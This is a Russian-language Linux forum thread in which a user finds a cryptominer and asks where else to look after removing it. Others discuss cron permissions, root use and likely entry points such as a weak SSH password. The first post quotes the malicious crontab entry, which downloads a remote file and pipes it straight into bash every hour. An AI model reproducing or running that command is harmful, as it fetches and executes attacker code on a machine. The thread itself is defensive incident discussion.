pavelchavyr |
|
Темы:
25
Сообщения:
248
Участник с: 25 января 2011
|
Заметил необычно высокую загруженность проца, оказалось, что работает в системе майнер. После непродолжительных поисков нашел в кроне такую строчку: 1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash; Скачивается вот этот файлик Процесс я прибил, команду в кроне удалил, но это наверное не все. Где еще проверить?
|
nafanja |
|
Темы:
94
Сообщения:
9252
Участник с: 02 июня 2012
заблокирован
|
ты чо под рутом сидишь?
Псевдографический инсталлятор Arch Linux ver. 3.8.2
Благодарности принимаются на ЯД 410012815723874 |
pavelchavyr |
|
Темы:
25
Сообщения:
248
Участник с: 25 января 2011
|
Нет, но ему привилегий пользователя вполне достаточно. |
valentoss78 |
|
Темы:
15
Сообщения:
436
Участник с: 26 апреля 2016
|
Кстати, а у меня раз 3 - 5 за последние лет 5 вообще в наглую просто на секунду появлялся чужой рабочий стол с терминалом каким то исполнением команд и панелькой unity ubuntu слева и тут же пропадал, даже тему создавал. Пробовал переустанавливать с полным удалением всех конфигов, чистил вообще жесткий диск, не помогло вроде. Забил. Тогда, когда интересовался, помню, было такое, вроде уязвимости на уровне модема могут быть, вроде о стандартных huawei речь шла, вертикальных. Не знаю как где, а у нас в Ростовской области их тулили всем подключающимся к Ростелеком, типа в аренду с последующим выкупом. |
Morisson |
|
Темы:
18
Сообщения:
1408
Участник с: 11 января 2017
|
pavelchavyrТак запись в кроне жеж от пользователя не создать. |
RusWolf |
|
Темы:
11
Сообщения:
2395
Участник с: 16 июля 2016
|
pavelchavyrА у меня wget даже не установлен. |
genues |
|
Темы:
24
Сообщения:
281
Участник с: 26 сентября 2011
|
MorissonРазве? Просто запускаться будет от имени пользователя, под которым создано задание.pavelchavyrТак запись в кроне жеж от пользователя не создать. Намного важнее определить источник заражения и принять меры. |
Ralph |
|
Темы:
4
Сообщения:
104
Участник с: 04 ноября 2013
|
Как вариант :
|
pavelchavyr |
|
Темы:
25
Сообщения:
248
Участник с: 25 января 2011
|
Вот как раз источник заражения меня и беспокоит, так как не могу его выявить. Подозреваю, что зашли через ssh, может даже просто сбрутфорсили, пароль слабый стоял. Однако в логах никаких записей подозрительных нет. |
corner |
|
Темы:
6
Сообщения:
773
Участник с: 21 июля 2011
|
Еще одна жертва, свеженькая Текст ссылки... |